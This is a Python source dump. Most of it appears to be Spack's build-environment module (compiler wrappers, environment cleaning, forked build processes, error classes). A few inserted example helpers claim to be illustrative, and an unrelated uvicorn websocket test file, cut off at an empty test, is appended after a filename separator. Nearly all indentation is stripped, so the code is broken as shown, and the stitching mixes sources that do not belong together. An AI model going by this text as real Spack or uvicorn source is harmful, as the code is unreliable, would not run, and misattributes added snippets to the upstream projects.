"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
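# An illustrative usage sketch (not part of Spack itself) showing how MakeExecutable's
# keyword arguments behave; it assumes `make` was created as MakeExecutable('make', 8).
def _example_make_usage(make):
    make()                                  # runs `make -j8`
    make(parallel=False)                    # runs a serial `make`, no -j flag
    make('install', jobs_env='MAKE_JOBS')   # runs `make -j8 install` with MAKE_JOBS=8
                                            # set in the child's environment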
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# On Cray "cluster" systems, unset CRAY_LD_LIBRARY_PATH to avoid
# interference with Spack dependencies.
# CNL requires these variables to be set (or at least some of them,
# depending on the CNL version).
hostarch = arch.Arch(arch.platform(), 'default_os', 'default_target')
on_cray = str(hostarch.platform) == 'cray'
using_cnl = re.match(r'cnl\d+', str(hostarch.os))
if on_cray and not using_cnl:
env.unset('CRAY_LD_LIBRARY_PATH')
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
# Unset the following variables because they can affect installation of
# Autotools and CMake packages.
build_system_vars = [
'CC', 'CFLAGS', 'CPP', 'CPPFLAGS', # C variables
'CXX', 'CCC', 'CXXFLAGS', 'CXXCPP', # C++ variables
'F77', 'FFLAGS', 'FLIBS', # Fortran77 variables
'FC', 'FCFLAGS', 'FCLIBS', # Fortran variables
'LDFLAGS', 'LIBS' # linker variables
]
for v in build_system_vars:
env.unset(v)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Make sure the executables for this compiler exist
compiler.verify_executables()
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
        # This avoids discrepancies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
for libdir in ['lib', 'lib64']:
lib_path = os.path.join(pkg.prefix, libdir)
rpath_dirs.append(lib_path)
# Set up link, include, RPATH directories that are passed to the
# compiler wrapper
for dep in link_deps:
if is_system_path(dep.prefix):
continue
query = pkg.spec[dep.name]
dep_link_dirs = list()
try:
dep_link_dirs.extend(query.libs.directories)
except NoLibrariesError:
tty.debug("No libraries found for {0}".format(dep.name))
for default_lib_dir in ['lib', 'lib64']:
default_lib_prefix = os.path.join(dep.prefix, default_lib_dir)
if os.path.isdir(default_lib_prefix):
dep_link_dirs.append(default_lib_prefix)
link_dirs.extend(dep_link_dirs)
if dep in rpath_deps:
rpath_dirs.extend(dep_link_dirs)
try:
include_dirs.extend(query.headers.directories)
except NoHeadersError:
tty.debug("No headers found for {0}".format(dep.name))
link_dirs = list(dedupe(filter_system_paths(link_dirs)))
include_dirs = list(dedupe(filter_system_paths(include_dirs)))
rpath_dirs = list(dedupe(filter_system_paths(rpath_dirs)))
env.set(SPACK_LINK_DIRS, ':'.join(link_dirs))
env.set(SPACK_INCLUDE_DIRS, ':'.join(include_dirs))
env.set(SPACK_RPATH_DIRS, ':'.join(rpath_dirs))
build_prefixes = [dep.prefix for dep in build_deps]
build_link_prefixes = [dep.prefix for dep in build_link_deps]
# add run-time dependencies of direct build-time dependencies:
for build_dep in build_deps:
for run_dep in build_dep.traverse(deptype='run'):
build_prefixes.append(run_dep.prefix)
# Filter out system paths: ['/', '/usr', '/usr/local']
# These paths can be introduced into the build when an external package
# is added as a dependency. The problem with these paths is that they often
# contain hundreds of other packages installed in the same directory.
# If these paths come first, they can overshadow Spack installations.
build_prefixes = filter_system_paths(build_prefixes)
build_link_prefixes = filter_system_paths(build_link_prefixes)
# Add dependencies to CMAKE_PREFIX_PATH
env.set_path('CMAKE_PREFIX_PATH', build_link_prefixes)
# Set environment variables if specified for
# the given compiler
compiler = pkg.compiler
env.extend(spack.schema.environment.parse(compiler.environment))
if compiler.extra_rpaths:
extra_rpaths = ':'.join(compiler.extra_rpaths)
env.set('SPACK_COMPILER_EXTRA_RPATHS', extra_rpaths)
# Add bin directories from dependencies to the PATH for the build.
for prefix in build_prefixes:
for dirname in ['bin', 'bin64']:
bin_dir = os.path.join(prefix, dirname)
if os.path.isdir(bin_dir):
env.prepend_path('PATH', bin_dir)
# Add spack build environment path with compiler wrappers first in
# the path. We add the compiler wrapper path, which includes default
# wrappers (cc, c++, f77, f90), AND a subdirectory containing
# compiler-specific symlinks. The latter ensures that builds that
# are sensitive to the *name* of the compiler see the right name when
# we're building with the wrappers.
#
# Conflicts on case-insensitive systems (like "CC" and "cc") are
# handled by putting one in the <build_env_path>/case-insensitive
# directory. Add that to the path too.
env_paths = []
compiler_specific = os.path.join(
spack.paths.build_env_path, pkg.compiler.name)
for item in [spack.paths.build_env_path, compiler_specific]:
env_paths.append(item)
ci = os.path.join(item, 'case-insensitive')
if os.path.isdir(ci):
env_paths.append(ci)
for item in env_paths:
env.prepend_path('PATH', item)
env.set_path(SPACK_ENV_PATH, env_paths)
# Working directory for the spack command itself, for debug logs.
if spack.config.get('config:debug'):
env.set(SPACK_DEBUG, 'TRUE')
env.set(SPACK_SHORT_SPEC, pkg.spec.short_spec)
env.set(SPACK_DEBUG_LOG_ID, pkg.spec.format('{name}-{hash:7}'))
env.set(SPACK_DEBUG_LOG_DIR, spack.main.spack_working_dir)
# Find ccache binary and hand it to build environment
if spack.config.get('config:ccache'):
ccache = Executable('ccache')
if not ccache:
raise RuntimeError("No ccache binary found in PATH")
env.set(SPACK_CCACHE_BINARY, ccache)
# Add any pkgconfig directories to PKG_CONFIG_PATH
for prefix in build_link_prefixes:
for directory in ('lib', 'lib64', 'share'):
pcdir = os.path.join(prefix, directory, 'pkgconfig')
if os.path.isdir(pcdir):
env.prepend_path('PKG_CONFIG_PATH', pcdir)
return env
def _set_variables_for_single_module(pkg, module):
"""Helper function to set module variables for single module."""
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
marker = '_set_run_already_called'
if getattr(module, marker, False):
return
jobs = spack.config.get('config:build_jobs', 16) if pkg.parallel else 1
jobs = min(jobs, multiprocessing.cpu_count())
assert jobs is not None, "no default set for config:build_jobs"
m = module
m.make_jobs = jobs
# TODO: make these build deps that can be installed if not found.
m.make = MakeExecutable('make', jobs)
m.gmake = MakeExecutable('gmake', jobs)
m.scons = MakeExecutable('scons', jobs)
m.ninja = MakeExecutable('ninja', jobs)
# easy shortcut to os.environ
m.env = os.environ
# Find the configure script in the archive path
# Don't use which for this; we want to find it in the current dir.
m.configure = Executable('./configure')
m.meson = Executable('meson')
m.cmake = Executable('cmake')
m.ctest = MakeExecutable('ctest', jobs)
# Standard CMake arguments
m.std_cmake_args = spack.build_systems.cmake.CMakePackage._std_args(pkg)
m.std_meson_args = spack.build_systems.meson.MesonPackage._std_args(pkg)
# Put spack compiler paths in module scope.
link_dir = spack.paths.build_env_path
m.spack_cc = os.path.join(link_dir, pkg.compiler.link_paths['cc'])
m.spack_cxx = os.path.join(link_dir, pkg.compiler.link_paths['cxx'])
m.spack_f77 = os.path.join(link_dir, pkg.compiler.link_paths['f77'])
m.spack_fc = os.path.join(link_dir, pkg.compiler.link_paths['fc'])
# Emulate some shell commands for convenience
m.pwd = os.getcwd
m.cd = os.chdir
m.mkdir = os.mkdir
m.makedirs = os.makedirs
m.remove = os.remove
m.removedirs = os.removedirs
m.symlink = os.symlink
m.mkdirp = mkdirp
m.install = install
m.install_tree = install_tree
m.rmtree = shutil.rmtree
m.move = shutil.move
# Useful directories within the prefix are encapsulated in
# a Prefix object.
m.prefix = pkg.prefix
# Platform-specific library suffix.
m.dso_suffix = dso_suffix
def static_to_shared_library(static_lib, shared_lib=None, **kwargs):
compiler_path = kwargs.get('compiler', m.spack_cc)
compiler = Executable(compiler_path)
return _static_to_shared_library(pkg.spec.architecture, compiler,
static_lib, shared_lib, **kwargs)
m.static_to_shared_library = static_to_shared_library
# Put a marker on this module so that it won't execute the body of this
# function again, since it is not needed
setattr(m, marker, True)
def set_module_variables_for_package(pkg):
"""Populate the module scope of install() with some useful functions.
This makes things easier for package writers.
"""
# If a user makes their own package repo, e.g.
# spack.pkg.mystuff.libelf.Libelf, and they inherit from an existing class
# like spack.pkg.original.libelf.Libelf, then set the module variables
# for both classes so the parent class can still use them if it gets
# called. parent_class_modules includes pkg.module.
modules = parent_class_modules(pkg.__class__)
for mod in modules:
_set_variables_for_single_module(pkg, mod)
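# Purely illustrative (an assumption about typical usage, not code from Spack): once
# set_module_variables_for_package() has injected names like `configure` and `make`
# into a package's module scope, an Autotools-style install() body can read almost
# like the shell script it was ported from, e.g.:
#
#     def install(self, spec, prefix):
#         configure('--prefix={0}'.format(prefix))
#         make()
#         make('install')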
def _static_to_shared_library(arch, compiler, static_lib, shared_lib=None,
**kwargs):
"""
Converts a static library to a shared library. The static library has to
be built with PIC for the conversion to work.
Parameters:
static_lib (str): Path to the static library.
shared_lib (str): Path to the shared library. Default is to derive
from the static library's path.
Keyword arguments:
compiler (str): Path to the compiler. Default is spack_cc.
compiler_output: Where to print compiler output to.
arguments (str list): Additional arguments for the compiler.
version (str): Library version. Default is unspecified.
compat_version (str): Library compatibility version. Default is
version.
"""
compiler_output = kwargs.get('compiler_output', None)
arguments = kwargs.get('arguments', [])
version = kwargs.get('version', None)
compat_version = kwargs.get('compat_version', version)
if not shared_lib:
shared_lib = '{0}.{1}'.format(os.path.splitext(static_lib)[0],
dso_suffix)
compiler_args = []
# TODO: Compiler arguments should not be hardcoded but provided by
# the different compiler classes.
if 'linux' in arch or 'cray' in arch:
soname = os.path.basename(shared_lib)
if compat_version:
soname += '.{0}'.format(compat_version)
compiler_args = [
'-shared',
'-Wl,-soname,{0}'.format(soname),
'-Wl,--whole-archive',
static_lib,
'-Wl,--no-whole-archive'
]
elif 'darwin' in arch:
install_name = shared_lib
if compat_version:
install_name += '.{0}'.format(compat_version)
compiler_args = [
'-dynamiclib',
'-install_name', '{0}'.format(install_name),
'-Wl,-force_load,{0}'.format(static_lib)
]
if compat_version:
compiler_args.extend(['-compatibility_version', '{0}'.format(
compat_version)])
if version:
compiler_args.extend(['-current_version', '{0}'.format(version)])
if len(arguments) > 0:
compiler_args.extend(arguments)
shared_lib_base = shared_lib
if version:
shared_lib += '.{0}'.format(version)
elif compat_version:
shared_lib += '.{0}'.format(compat_version)
compiler_args.extend(['-o', shared_lib])
# Create symlinks for version and compat_version
shared_lib_link = os.path.basename(shared_lib)
if version or compat_version:
os.symlink(shared_lib_link, shared_lib_base)
if compat_version and compat_version != version:
os.symlink(shared_lib_link, '{0}.{1}'.format(shared_lib_base,
compat_version))
return compiler(*compiler_args, output=compiler_output)
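# Hedged usage sketch, not called anywhere by Spack itself: shows how a
# package's install() could invoke the module-level helper injected above.
# The archive name 'libfoo.a' and the version strings are hypothetical.
def _example_static_to_shared(pkg):
    convert = pkg.module.static_to_shared_library
    # Derives 'libfoo.<dso_suffix>' (plus the version suffix and symlinks)
    # next to the archive, assuming libfoo.a was built with PIC.
    return convert('libfoo.a', version='1.2.0', compat_version='1')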
def get_rpath_deps(pkg):
"""Return immediate or transitive RPATHs depending on the package."""
if pkg.transitive_rpaths:
return [d for d in pkg.spec.traverse(root=False, deptype=('link'))]
else:
return pkg.spec.dependencies(deptype='link')
def get_rpaths(pkg):
"""Get a list of all the rpaths for a package."""
rpaths = [pkg.prefix.lib, pkg.prefix.lib64]
deps = get_rpath_deps(pkg)
rpaths.extend(d.prefix.lib for d in deps
if os.path.isdir(d.prefix.lib))
rpaths.extend(d.prefix.lib64 for d in deps
if os.path.isdir(d.prefix.lib64))
# Second module is our compiler mod name. We use that to get rpaths from
# module show output.
if pkg.compiler.modules and len(pkg.compiler.modules) > 1:
rpaths.append(get_path_from_module(pkg.compiler.modules[1]))
return list(dedupe(filter_system_paths(rpaths)))
def get_std_cmake_args(pkg):
"""List of standard arguments used if a package is a CMakePackage.
    Args:
        pkg (PackageBase): package under consideration
    Returns:
        list of str: standard arguments that would be used if this
        package were a CMakePackage instance.
"""
return spack.build_systems.cmake.CMakePackage._std_args(pkg)
def get_std_meson_args(pkg):
"""List of standard arguments used if a package is a MesonPackage.
    Args:
        pkg (PackageBase): package under consideration
    Returns:
        list of str: standard arguments that would be used if this
        package were a MesonPackage instance.
"""
return spack.build_systems.meson.MesonPackage._std_args(pkg)
def parent_class_modules(cls):
"""
Get list of superclass modules that descend from spack.package.PackageBase
Includes cls.__module__
"""
if (not issubclass(cls, spack.package.PackageBase) or
issubclass(spack.package.PackageBase, cls)):
return []
result = []
module = sys.modules.get(cls.__module__)
if module:
result = [module]
for c in cls.__bases__:
result.extend(parent_class_modules(c))
return result
def load_external_modules(pkg):
"""Traverse a package's spec DAG and load any external modules.
Traverse a package's dependencies and load any external modules
associated with them.
Args:
pkg (PackageBase): package to load deps for
"""
for dep in list(pkg.spec.traverse()):
if dep.external_module:
load_module(dep.external_module)
def setup_package(pkg, dirty):
"""Execute all environment setup routines."""
build_env = EnvironmentModifications()
if not dirty:
clean_environment()
set_compiler_environment_variables(pkg, build_env)
set_build_environment_variables(pkg, build_env, dirty)
pkg.architecture.platform.setup_platform_environment(pkg, build_env)
build_env.extend(
modifications_from_dependencies(pkg.spec, context='build')
)
if (not dirty) and (not build_env.is_unset('CPATH')):
tty.debug("A dependency has updated CPATH, this may lead pkg-config"
" to assume that the package is part of the system"
" includes and omit it when invoked with '--cflags'.")
set_module_variables_for_package(pkg)
pkg.setup_build_environment(build_env)
# Loading modules, in particular if they are meant to be used outside
# of Spack, can change environment variables that are relevant to the
# build of packages. To avoid a polluted environment, preserve the
# value of a few, selected, environment variables
# With the current ordering of environment modifications, this is strictly
# unnecessary. Modules affecting these variables will be overwritten anyway
with preserve_environment('CC', 'CXX', 'FC', 'F77'):
# All module loads that otherwise would belong in previous
# functions have to occur after the build_env object has its
# modifications applied. Otherwise the environment modifications
# could undo module changes, such as unsetting LD_LIBRARY_PATH
# after a module changes it.
for mod in pkg.compiler.modules:
# Fixes issue https://github.com/spack/spack/issues/3153
if os.environ.get("CRAY_CPU_TARGET") == "mic-knl":
load_module("cce")
load_module(mod)
# kludge to handle cray libsci being automatically loaded by PrgEnv
# modules on cray platform. Module unload does no damage when
# unnecessary
module('unload', 'cray-libsci')
if pkg.architecture.target.module_name:
load_module(pkg.architecture.target.module_name)
load_external_modules(pkg)
implicit_rpaths = pkg.compiler.implicit_rpaths()
if implicit_rpaths:
build_env.set('SPACK_COMPILER_IMPLICIT_RPATHS',
':'.join(implicit_rpaths))
# Make sure nothing's strange about the Spack environment.
validate(build_env, tty.warn)
build_env.apply_modifications()
def modifications_from_dependencies(spec, context):
"""Returns the environment modifications that are required by
the dependencies of a spec and also applies modifications
to this spec's package at module scope, if need be.
Args:
spec (Spec): spec for which we want the modifications
context (str): either 'build' for build-time modifications or 'run'
for run-time modifications
"""
env = EnvironmentModifications()
pkg = spec.package
# Maps the context to deptype and method to be called
deptype_and_method = {
'build': (('build', 'link', 'test'),
'setup_dependent_build_environment'),
'run': (('link', 'run'), 'setup_dependent_run_environment')
}
deptype, method = deptype_and_method[context]
for dspec in spec.traverse(order='post', root=False, deptype=deptype):
dpkg = dspec.package
set_module_variables_for_package(dpkg)
# Allow dependencies to modify the module
dpkg.setup_dependent_package(pkg.module, spec)
getattr(dpkg, method)(env, spec)
return env
def fork(pkg, function, dirty, fake):
"""Fork a child process to do part of a spack build.
Args:
pkg (PackageBase): package whose environment we should set up the
forked process for.
function (callable): argless function to run in the child
process.
dirty (bool): If True, do NOT clean the environment before
building.
fake (bool): If True, skip package setup b/c it's not a real build
Usage::
def child_fun():
# do stuff
build_env.fork(pkg, child_fun)
Forked processes are run with the build environment set up by
spack.build_environment. This allows package authors to have full
control over the environment, etc. without affecting other builds
that might be executed in the same spack call.
If something goes wrong, the child process catches the error and
passes it to the parent wrapped in a ChildError. The parent is
expected to handle (or re-raise) the ChildError.
"""
def child_process(child_pipe, input_stream):
# We are in the child process. Python sets sys.stdin to
# open(os.devnull) to prevent our process and its parent from
# simultaneously reading from the original stdin. But, we assume
# that the parent process is not going to read from it till we
# are done with the child, so we undo Python's precaution.
if input_stream is not None:
sys.stdin = input_stream
try:
if not fake:
setup_package(pkg, dirty=dirty)
return_value = function()
child_pipe.send(return_value)
except StopPhase as e:
            # Do not create a full ChildError from this; it's not an error,
            # it's a control statement.
child_pipe.send(e)
except BaseException:
# catch ANYTHING that goes wrong in the child process
exc_type, exc, tb = sys.exc_info()
# Need to unwind the traceback in the child because traceback
# objects can't be sent to the parent.
tb_string = traceback.format_exc()
# build up some context from the offending package so we can
# show that, too.
package_context = get_package_context(tb)
build_log = None
if hasattr(pkg, 'log_path'):
build_log = pkg.log_path
# make a pickleable exception to send to parent.
msg = "%s: %s" % (exc_type.__name__, str(exc))
ce = ChildError(msg,
exc_type.__module__,
exc_type.__name__,
tb_string, build_log, package_context)
child_pipe.send(ce)
finally:
child_pipe.close()
parent_pipe, child_pipe = multiprocessing.Pipe()
input_stream = None
try:
# Forward sys.stdin when appropriate, to allow toggling verbosity
if sys.stdin.isatty() and hasattr(sys.stdin, 'fileno'):
input_stream = os.fdopen(os.dup(sys.stdin.fileno()))
p = multiprocessing.Process(
target=child_process, args=(child_pipe, input_stream))
p.start()
except InstallError as e:
e.pkg = pkg
raise
finally:
# Close the input stream in the parent process
if input_stream is not None:
input_stream.close()
child_result = parent_pipe.recv()
p.join()
    # If the child returned a StopPhase, raise it
if isinstance(child_result, StopPhase):
# do not print
raise child_result
# let the caller know which package went wrong.
if isinstance(child_result, InstallError):
child_result.pkg = pkg
if isinstance(child_result, ChildError):
# If the child process raised an error, print its output here rather
# than waiting until the call to SpackError.die() in main(). This
# allows exception handling output to be logged from within Spack.
# see spack.main.SpackCommand.
child_result.print_context()
raise child_result
return child_result
def get_package_context(traceback, context=3):
"""Return some context for an error message when the build fails.
Args:
traceback (traceback): A traceback from some exception raised during
install
context (int): Lines of context to show before and after the line
where the error happened
This function inspects the stack to find where we failed in the
package file, and it adds detailed context to the long_message
from there.
"""
def make_stack(tb, stack=None):
"""Tracebacks come out of the system in caller -> callee order. Return
an array in callee -> caller order so we can traverse it."""
if stack is None:
stack = []
if tb is not None:
make_stack(tb.tb_next, stack)
stack.append(tb)
return stack
stack = make_stack(traceback)
for tb in stack:
frame = tb.tb_frame
if 'self' in frame.f_locals:
# Find the first proper subclass of PackageBase.
obj = frame.f_locals['self']
if isinstance(obj, spack.package.PackageBase):
break
# We found obj, the Package implementation we care about.
# Point out the location in the install method where we failed.
lines = [
'{0}:{1:d}, in {2}:'.format(
inspect.getfile(frame.f_code),
frame.f_lineno - 1, # subtract 1 because f_lineno is 0-indexed
frame.f_code.co_name
)
]
# Build a message showing context in the install method.
sourcelines, start = inspect.getsourcelines(frame)
# Calculate lineno of the error relative to the start of the function.
# Subtract 1 because f_lineno is 0-indexed.
fun_lineno = frame.f_lineno - start - 1
start_ctx = max(0, fun_lineno - context)
sourcelines = sourcelines[start_ctx:fun_lineno + context + 1]
for i, line in enumerate(sourcelines):
is_error = start_ctx + i == fun_lineno
mark = '>> ' if is_error else ' '
# Add start to get lineno relative to start of file, not function.
marked = ' {0}{1:-6d}{2}'.format(
mark, start + start_ctx + i, line.rstrip())
if is_error:
marked = colorize('@R{%s}' % cescape(marked))
lines.append(marked)
return lines
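# Hedged illustration of the intended call pattern for get_package_context():
# capture a traceback in an except block and pass it in.  With no PackageBase
# frame on the stack, the returned context simply points at this function.
def _example_get_package_context():
    try:
        raise ValueError('stand-in for a failed build step')
    except ValueError:
        tb = sys.exc_info()[2]
        return get_package_context(tb, context=2)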
class InstallError(spack.error.SpackError):
"""Raised by packages when a package fails to install.
    Any subclass of InstallError will be annotated by Spack with a
``pkg`` attribute on failure, which the caller can use to get the
package for which the exception was raised.
"""
class ChildError(InstallError):
"""Special exception class for wrapping exceptions from child processes
in Spack's build environment.
The main features of a ChildError are:
1. They're serializable, so when a child build fails, we can send one
of these to the parent and let the parent report what happened.
2. They have a ``traceback`` field containing a traceback generated
on the child immediately after failure. Spack will print this on
failure in lieu of trying to run sys.excepthook on the parent
process, so users will see the correct stack trace from a child.
3. They also contain context, which shows context in the Package
implementation where the error happened. This helps people debug
Python code in their packages. To get it, Spack searches the
stack trace for the deepest frame where ``self`` is in scope and
is an instance of PackageBase. This will generally find a useful
spot in the ``package.py`` file.
The long_message of a ChildError displays one of two things:
1. If the original error was a ProcessError, indicating a command
died during the build, we'll show context from the build log.
2. If the original error was any other type of error, we'll show
context from the Python code.
SpackError handles displaying the special traceback if we're in debug
mode with spack -d.
"""
# List of errors considered "build errors", for which we'll show log
# context instead of Python context.
build_errors = [('spack.util.executable', 'ProcessError')]
def __init__(self, msg, module, classname, traceback_string, build_log,
context):
super(ChildError, self).__init__(msg)
self.module = module
self.name = classname
self.traceback = traceback_string
self.build_log = build_log
self.context = context
@property
def long_message(self):
out = StringIO()
out.write(self._long_message if self._long_message else '')
if (self.module, self.name) in ChildError.build_errors:
            # The error happened in some externally executed process. Show
# the build log with errors or warnings highlighted.
if self.build_log and os.path.exists(self.build_log):
errors, warnings = parse_log_events(self.build_log)
nerr = len(errors)
nwar = len(warnings)
if nerr > 0:
# If errors are found, only display errors
out.write(
"\n%s found in build log:\n" % plural(nerr, 'error'))
out.write(make_log_context(errors))
elif nwar > 0:
# If no errors are found but warnings are, display warnings
out.write(
"\n%s found in build log:\n" % plural(nwar, 'warning'))
out.write(make_log_context(warnings))
else:
            # The error happened in the Python code, so try to show
# some context from the Package itself.
if self.context:
out.write('\n')
out.write('\n'.join(self.context))
out.write('\n')
if out.getvalue():
out.write('\n')
if self.build_log and os.path.exists(self.build_log):
out.write('See build log for details:\n')
out.write(' %s\n' % self.build_log)
return out.getvalue()
def __str__(self):
return self.message + self.long_message + self.traceback
def __reduce__(self):
"""__reduce__ is used to serialize (pickle) ChildErrors.
Return a function to reconstruct a ChildError, along with the
salient properties we'll need.
"""
return _make_child_error, (
self.message,
self.module,
self.name,
self.traceback,
self.build_log,
self.context)
def _make_child_error(msg, module, name, traceback, build_log, context):
"""Used by __reduce__ in ChildError to reconstruct pickled errors."""
return ChildError(msg, module, name, traceback, build_log, context)
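# Hedged sketch, not used by Spack: shows that ChildError survives pickling
# via __reduce__, which is what lets the child process send it back through
# the multiprocessing pipe.  All field values below are made up.
def _example_child_error_roundtrip():
    import pickle
    err = ChildError('demo failure', 'spack.util.executable', 'ProcessError',
                     'Traceback (most recent call last): ...', None,
                     ['  >>    12     make()'])
    clone = pickle.loads(pickle.dumps(err))
    return clone.module, clone.name, clone.traceback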
class StopPhase(spack.error.SpackError):
"""Pickle-able exception to control stopped builds."""
def __reduce__(self):
return _make_stop_phase, (self.message, self.long_message)
def _make_stop_phase(msg, long_msg):
return StopPhase(msg, long_msg)
|
test_websocket.py
|
import asyncio
import functools
import threading
import requests
import pytest
import websockets
from contextlib import contextmanager
from uvicorn.protocols.http import HttpToolsProtocol
class WebSocketResponse:
persist = False
def __init__(self, scope):
self.scope = scope
async def __call__(self, receive, send):
self.send = send
if self.persist:
while True:
message = await receive()
await self.handle(message)
else:
message = await receive()
await self.handle(message)
async def handle(self, message):
message_type = message["type"].replace(".", "_")
handler = getattr(self, message_type)
await handler(message)
def run_loop(loop):
loop.run_forever()
loop.close()
@contextmanager
def run_server(app):
asyncio.set_event_loop(None)
loop = asyncio.new_event_loop()
protocol = functools.partial(HttpToolsProtocol, app=app, loop=loop)
create_server_task = loop.create_server(protocol, host="127.0.0.1")
server = loop.run_until_complete(create_server_task)
url = "ws://127.0.0.1:%d/" % server.sockets[0].getsockname()[1]
try:
# Run the event loop in a new thread.
thread = threading.Thread(target=run_loop, args=[loop])
thread.start()
# Return the contextmanager state.
yield url
finally:
# Close the loop from our main thread.
loop.call_soon_threadsafe(loop.stop)
thread.join()
def test_invalid_upgrade():
def app(scope):
pass
with run_server(app) as url:
url = url.replace("ws://", "http://")
response = requests.get(
url, headers={"upgrade": "websocket", "connection": "upgrade"}, timeout=5
)
assert response.status_code == 403
def test_accept_connection():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
async def open_connection(url):
async with websockets.connect(url) as websocket:
return websocket.open
with run_server(App) as url:
loop = asyncio.new_event_loop()
is_open = loop.run_until_complete(open_connection(url))
assert is_open
loop.close()
def test_send_text_data_to_client():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "text": "123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == "123"
loop.close()
def test_send_binary_data_to_client():
class App(WebSocketResponse):
async def websocket_connect(self, message):
await self.send({"type": "websocket.accept"})
await self.send({"type": "websocket.send", "bytes": b"123"})
async def get_data(url):
async with websockets.connect(url) as websocket:
return await websocket.recv()
with run_server(App) as url:
loop = asyncio.new_event_loop()
data = loop.run_until_complete(get_data(url))
assert data == b"123"
loop.close()
def test_send_and_close_connection():
